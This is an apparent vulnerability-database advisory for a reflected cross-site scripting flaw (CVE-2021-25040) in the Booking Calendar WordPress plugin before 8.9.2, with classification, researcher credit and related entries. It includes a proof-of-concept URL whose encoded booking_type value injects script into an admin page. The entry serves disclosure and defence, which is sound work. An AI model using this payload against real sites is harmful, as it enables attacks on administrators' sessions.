WordPress Plugin Vulnerabilities

Booking Calendar < 8.9.2 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the booking_type parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpbc&booking_type=%22%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E%3Cscript%3E%2F%2A

Affects Plugins

Plugin icon
booking
Fixed in 8.9.2

References

CVE
CVE-2021-25040

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.5 (high)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
3ed821a6-c3e2-4964-86f8-d14c4a54708a

Timeline

Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-06 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2018-01-26
Title
Splashing Images <= 2.1 - Cross-Site Scripting (XSS)
Published
2021-08-06
Title
WP Fusion Lite < 3.37.30 - Reflected Cross-Site Scripting (XSS)
Published
2023-03-22
Title
W4 Post List < 2.4.6 - Contributor+ Stored XSS
Published
2021-06-28
Title
Migrate Users <= 1.0.1 - CSRF to Stored Cross-Site Scripting (XSS)
Published
2016-06-22
Title
WordPress File Monitor - Stored Cross-Site Scripting (XSS)